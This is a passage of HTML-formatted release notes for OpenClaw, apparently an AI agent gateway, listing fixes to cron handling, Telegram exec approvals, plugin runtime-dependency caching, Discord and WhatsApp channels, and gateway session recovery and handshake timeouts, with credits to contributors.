<li>Cron: treat implicit text payloads with agent-turn overrides as agent turns, preserving model overrides for scheduled text prompts instead of pruning them as system events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001694353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/28905" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/28905/hovercard" href="https://github.com/openclaw/openclaw/issues/28905">#28905</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236386081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64060" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64060/hovercard" href="https://github.com/openclaw/openclaw/pull/64060">#64060</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liaoandi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liaoandi">@liaoandi</a>.</li>
<li>Telegram/exec approvals: stop treating general Telegram chat allowlists and <code>defaultTo</code> routes as native exec approvers; Telegram now uses explicit <code>execApprovals.approvers</code> or owner identity from <code>commands.ownerAllowFrom</code>, matching the first-pairing owner bootstrap path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/providers: keep Gateway startup primary-model discovery on metadata-only provider entries and reuse active non-speech capability providers even with explicit plugin entries, avoiding unnecessary provider registry loads during startup and media capability checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345357678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73729" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73729/hovercard" href="https://github.com/openclaw/openclaw/issues/73729">#73729</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346570757" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73835/hovercard" href="https://github.com/openclaw/openclaw/issues/73835">#73835</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346027613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73793/hovercard" href="https://github.com/openclaw/openclaw/issues/73793">#73793</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346797079" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73853" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73853/hovercard" href="https://github.com/openclaw/openclaw/pull/73853">#73853</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346030125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73794/hovercard" href="https://github.com/openclaw/openclaw/pull/73794">#73794</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/poolside-ventures/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/poolside-ventures">@poolside-ventures</a>.</li>
<li>Chat commands: route sensitive group <code>/diagnostics</code> and <code>/export-trajectory</code> approvals and results to a private owner route, preferring same-surface DMs before falling back to the first configured owner route, so Discord group invocations can land in Telegram when that is the primary owner interface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/hooks: keep successful <code>deliver:false</code> agent hooks silent, log a hook audit record for suppressed success announcements, and suppress fallback summaries after attempted hook delivery while still surfacing failed hook runs. Repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4151948578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55761" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55761/hovercard" href="https://github.com/openclaw/openclaw/pull/55761">#55761</a>; builds on <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4028886435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/36332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/36332/hovercard" href="https://github.com/openclaw/openclaw/pull/36332">#36332</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091099015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49234" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49234/hovercard" href="https://github.com/openclaw/openclaw/pull/49234">#49234</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EffortlessSteven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EffortlessSteven">@EffortlessSteven</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cioclawcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cioclawcode">@cioclawcode</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BrennerSpear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BrennerSpear">@BrennerSpear</a>.</li>
<li>Plugin SDK/Discord: restore a deprecated <code>openclaw/plugin-sdk/discord</code> compatibility facade and the legacy compat group-policy warning export for the published <code>@openclaw/discord@2026.3.13</code> package, covering its config, account, directory, status, and thread-binding imports while keeping new plugins on generic SDK subpaths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344804450" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73685/hovercard" href="https://github.com/openclaw/openclaw/issues/73685">#73685</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345028871" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73703/hovercard" href="https://github.com/openclaw/openclaw/pull/73703">#73703</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rderickson9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rderickson9">@rderickson9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Channels/Discord: suppress duplicate gateway monitors when multiple enabled accounts resolve to the same bot token, preferring config tokens over default env fallback and reporting skipped duplicates as disabled. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344054955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73608" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73608/hovercard" href="https://github.com/openclaw/openclaw/pull/73608">#73608</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>CLI/health: build channel health summaries from inspected credential metadata plus runtime state, so <code>openclaw health --json</code> reports Discord <code>running</code>, <code>connected</code>, and <code>tokenSource</code> consistently with channel status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066903951" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44354" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44354/hovercard" href="https://github.com/openclaw/openclaw/issues/44354">#44354</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ferenc-acs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ferenc-acs">@ferenc-acs</a>.</li>
<li>Control UI/Talk: decode Google Live binary WebSocket JSON frames and stop queued browser audio on interruption or shutdown, so browser Talk leaves <code>Connecting Talk...</code> and barge-in no longer plays stale audio. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343876260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73601/hovercard" href="https://github.com/openclaw/openclaw/issues/73601">#73601</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342101919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73460/hovercard" href="https://github.com/openclaw/openclaw/issues/73460">#73460</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342138204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73466/hovercard" href="https://github.com/openclaw/openclaw/pull/73466">#73466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>.</li>
<li>Channels/Discord: ignore stale route-shaped conversation bindings after a Discord channel is reconfigured to another agent, while preserving explicit focus and subagent bindings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344233247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73626/hovercard" href="https://github.com/openclaw/openclaw/issues/73626">#73626</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ramitrkar-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ramitrkar-hash">@ramitrkar-hash</a>.</li>
<li>Agents/bootstrap: pass pending BOOTSTRAP.md contents through the first-run user prompt while keeping them out of privileged system context, and show limited bootstrap guidance when workspace file access is unavailable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344203540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73622/hovercard" href="https://github.com/openclaw/openclaw/issues/73622">#73622</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mark1010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mark1010">@mark1010</a>.</li>
<li>ACP/tasks: classify parent-owned ACP sessions as background work regardless of persistent runtime mode, and close terminal stale ACP sessions when no active binding remains, so delegated ACP output reports through the parent task notifier instead of acting like a normal foreground chat session. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Tasks: keep terminal mirrored TaskFlow timestamps pinned to task completion time and let maintenance repair stale mirrors, so ACP terminal delivery updates no longer leave inconsistent flow audits. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Gateway/sessions: add conservative stuck-session recovery that releases only stale session lanes while active embedded runs, reply operations, and lane tasks remain serialized, so queued follow-ups can drain without aborting legitimate long-running turns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343463353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73581/hovercard" href="https://github.com/openclaw/openclaw/issues/73581">#73581</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344463460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73655/hovercard" href="https://github.com/openclaw/openclaw/issues/73655">#73655</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345057984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73705/hovercard" href="https://github.com/openclaw/openclaw/issues/73705">#73705</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343876260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73601/hovercard" href="https://github.com/openclaw/openclaw/issues/73601">#73601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WS-Q0758/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WS-Q0758">@WS-Q0758</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bryangauvin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bryangauvin">@bryangauvin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spenceryang1996-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spenceryang1996-dot">@spenceryang1996-dot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bmilne1981/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bmilne1981">@bmilne1981</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattmcintyre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattmcintyre">@mattmcintyre</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a>.</li>
<li>Plugins: cache unchanged plugin manifest loads by file signature, reducing repeated JSON/JSON5 parsing and manifest normalization in bursty startup and runtime registry paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344765997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73678/hovercard" href="https://github.com/openclaw/openclaw/pull/73678">#73678</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TheDutchRuler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TheDutchRuler">@TheDutchRuler</a>.</li>
<li>Plugins/runtime-deps: cache unchanged bundled runtime mirror dist-file materialization decisions and close file-lock handles on owner-write failures, reducing repeated startup chunk scans and avoiding FileHandle-GC recovery stalls. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Plugins/runtime-deps: retry and defer transient cleanup failures for owned runtime staging directories so CLI startup no longer aborts after a successful bundled dependency swap. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347196394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73903" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73903/hovercard" href="https://github.com/openclaw/openclaw/issues/73903">#73903</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bobfreeman1989/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bobfreeman1989">@bobfreeman1989</a>.</li>
<li>Plugins/runtime-deps: cache bundled runtime-deps JSON/package files by file signature, reducing repeated staged-runtime metadata reads during bundled channel startup. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345057984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73705/hovercard" href="https://github.com/openclaw/openclaw/issues/73705">#73705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattmcintyre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattmcintyre">@mattmcintyre</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bmilne1981/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bmilne1981">@bmilne1981</a>.</li>
<li>Plugins/runtime-deps: delegate bundled plugin dependency staging to complete npm/pnpm install plans with durable runtime state, removing retained-manifest and source-checkout cache reconciliation from Gateway startup. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmfraga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmfraga">@jmfraga</a>.</li>
<li>Plugins/runtime-deps: replace Gateway-start root chunk dependency inference with explicit mirrored-root dependency metadata, reducing staged runtime scans while preserving lazy per-plugin installs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Plugins/runtime-deps: run pnpm staged installs outside the repository workspace and disable pnpm release-age gates for exact bundled runtime dependency materialization, so bundled plugin dependency repair writes packages into the generated stage without blocking fresh packaged dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>CLI/TUI: keep <code>chat.history</code> off model-catalog discovery so initial Gateway-backed TUI history loads cannot block behind slow provider/plugin model scans on low-core hosts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342748182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73524" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73524/hovercard" href="https://github.com/openclaw/openclaw/issues/73524">#73524</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/harshcatsystems-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/harshcatsystems-collab">@harshcatsystems-collab</a>.</li>
<li>Channels/WhatsApp: flag recently reconnected linked accounts in channel status even when the socket is currently healthy, so flapping WhatsApp Web sessions no longer look clean after a brief reconnect. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>.</li>
<li>Channels/WhatsApp: log shared dispatcher delivery failures with reply kind, message id, chat id, and connection id, so typing-without-send reports can identify whether the WhatsApp send path rejected a generated reply. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349593113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74269" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74269/hovercard" href="https://github.com/openclaw/openclaw/issues/74269">#74269</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomcosta-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomcosta-git">@tomcosta-git</a>.</li>
<li>Feishu: suppress distinct late <code>final</code> text deliveries after a streaming card has already closed, while keeping media attachments deliverable, so late-finals no longer reopen duplicate Feishu cards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330083943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71977" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71977/hovercard" href="https://github.com/openclaw/openclaw/issues/71977">#71977</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331519751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72294" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72294/hovercard" href="https://github.com/openclaw/openclaw/pull/72294">#72294</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MonkeyLeeT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MonkeyLeeT">@MonkeyLeeT</a>.</li>
<li>Gateway: expose <code>gateway.handshakeTimeoutMs</code> in config, schema, and docs while preserving <code>OPENCLAW_HANDSHAKE_TIMEOUT_MS</code> precedence, so loaded or low-powered hosts can tune local WebSocket pre-auth handshakes without patching dist files. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110188380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51282" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51282/hovercard" href="https://github.com/openclaw/openclaw/pull/51282">#51282</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henry-the-frog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henry-the-frog">@henry-the-frog</a>.</li>
<li>Gateway/TUI/status: align configured and env-based WebSocket handshake budgets across local clients, probes, and fallback RPCs while preserving explicit status timeouts and paired-device auth fallback, so slow local gateways are not marked unreachable by a shorter client watchdog. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342748182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73524" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73524/hovercard" href="https://github.com/openclaw/openclaw/issues/73524">#73524</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342797952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73535" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73535/hovercard" href="https://github.com/openclaw/openclaw/issues/73535">#73535</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/harshcatsystems-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" 